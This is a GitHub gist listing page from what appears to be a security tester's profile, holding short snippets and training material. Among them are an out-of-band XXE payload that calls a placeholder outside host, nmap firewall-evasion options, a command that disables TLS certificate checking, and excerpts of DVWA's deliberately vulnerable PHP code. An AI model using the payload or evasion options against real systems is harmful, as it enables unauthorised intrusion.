Skip to content

Instantly share code, notes, and snippets.

Vlad Styran sapran

Block or report user

Report or block sapran

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@sapran
sapran / electron_proxy
Created Jan 31, 2019
Run Electron via proxy
View electron_proxy
NODE_TLS_REJECT_UNAUTHORIZED=0 proxychains4 -f ~/proxychains.conf /Applications/Grammarly.app/Contents/MacOS/Grammarly
View iptables_vpn
ip rule add from $(ip route get 1 | grep -Po '(?<=src )(\S+)') table 128
ip route add table 128 to $(ip route get 1 | grep -Po '(?<=src )(\S+)')/32 dev $(ip -4 route ls | grep default | grep -Po '(?<=dev )(\S+)')
ip route add table 128 default via $(ip -4 route ls | grep default | grep -Po '(?<=via )(\S+)')
View resolvers.txt
1.2.4.8
103.22.248.62
106.186.17.181
109.69.8.34
109.69.8.51
111.223.252.161
114.114.114.114
114.114.114.119
114.114.115.115
114.114.115.119
@sapran
sapran / sample3.php
Last active Apr 6, 2018
Code fragment from @ethicalhack3r's DVWA: github.com/ethicalhack3r/DVWA
View sample3.php
<?php
$html = "";
if ($_SERVER['REQUEST_METHOD'] == "POST") {
if (!isset ($_SESSION['last_session_id'])) {
$_SESSION['last_session_id'] = 0;
}
$_SESSION['last_session_id']++;
$cookie_value = $_SESSION['last_session_id'];
@sapran
sapran / sample2.php
Last active Apr 6, 2018
Code fragment from @ethicalhack3r's DVWA: github.com/ethicalhack3r/DVWA
View sample2.php
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
@sapran
sapran / appsec_awareness_training_day3.md
Last active Mar 29, 2018
Notes to Application Security awareness training in line with OWASP SAMM initial development team education effort according to Education and Guidance practice.
View appsec_awareness_training_day3.md
@sapran
sapran / appsec_awareness_training_day2.md
Last active Mar 27, 2018
Notes to Application Security awareness training in line with OWASP SAMM initial development team education effort according to Education and Guidance practice.
@sapran
sapran / vagrant-patch-for-virtualbox-5.2
Created Mar 25, 2018 — forked from roktas/vagrant-patch-for-virtualbox-5.2
Patch to make vagrant work with VBox 5.2
View vagrant-patch-for-virtualbox-5.2
#!/bin/bash
set -eo pipefail
TARGETFMT='/opt/vagrant/embedded/gems/gems/vagrant-%s/plugins/providers/virtualbox/driver/meta.rb'
die() { echo >&2 "$@"; exit 1; }
[[ $EUID -eq 0 ]] || die "sudo required"
View oob_xxe
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
View nmap_firewall
nmap options/ideas to avoid Firewall
fragmentation
-f
change default MTU
--mtu 24
random number of decoys
-D RND:10
You can’t perform that action at this time.